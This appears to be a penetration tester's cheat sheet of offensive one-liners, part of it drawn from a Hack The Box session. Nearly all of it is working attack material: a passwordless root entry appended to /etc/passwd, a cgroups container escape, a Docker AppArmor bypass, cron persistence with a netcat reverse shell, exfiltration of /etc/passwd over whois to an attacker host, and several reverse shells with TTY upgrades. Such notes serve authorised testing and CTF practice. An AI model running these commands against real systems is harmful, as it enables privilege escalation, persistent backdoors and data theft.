Skip to content


Adding password to writable passwd file

If /etc/passwd is writable, you can just add a passwordless root account by echoing an extra line to it, using root's UID and GID of 0.

echo brigzzy::0:0:brigzzy:/root:/bin/bash >> /etc/passwd

su - brigzzy drops you straight to root

Bash Portscanner

for p in {1..65335}; do(echo >/dev/tcp/$p) >/dev/null 2>&1 && echo "$p open"; done

Connect to an SMB Share

smbclient // -I -N

Container Escape

Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

Persistence on a Box via Cron

One liner to add persistence on a box via cron

echo "* * * * * /bin/nc 1234 -e /bin/bash" > cron && crontab cron


echo "* * * * * mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 1234 1>/tmp/backpipe" > cron && crontab cron

and on

nc -lvp 1234

Docker Apparmor Bypass

FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions

Docker Container Escape

If your account is a member of the docker group, you can download the docker binary, even if it's not installed in your container/in your path.

From there you can run a container in the container, mount the root filesystem, and you've got root on the host!

./docker run -it -v /:/home/ ubuntu bash

Exfiltrate data with Whois

Have limited ways to exfiltrate data? Use Whois!

attacker: nc -lvp 53 | sed "s/ //g" | base64 -d

victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64

Find files with suid set

find / -perm -4000 2>/dev/null

Host quick web server to copy files (with PHP)

php -S

then you can wget

Netcat Portscanner

nc -zvvvn 1-65535 2>&1 | tee scan.txt

netcat reverse shell

Listener: nc -lvp 4444

Connector: nc 4444 -e /bin/bash


rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 4444 > /tmp/f

then you can upgrade your shell like this:

python: python -c 'import pty;pty.spawn("/bin/bash")'

python3: python3 -c 'import pty; pty.spawn("/bin/bash")'

Then on either: export SHELL=bash && export TERM=screen && reset


$ which python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Aogiri:/var/www/html$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/ghoul# stty raw -echo
root@kali:~/Desktop/HTB/boxes/ghoul# nc -lvnp 1337

www-data@Aogiri:/var/www/html$ export TERM=screen

OR (no -e support):

Listener: nc -nvlp 1234

Connector: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 1234 1>/tmp/backpipe

Spawn Bash Shell via Python

python -c 'import pty; pty.spawn("/bin/bash")'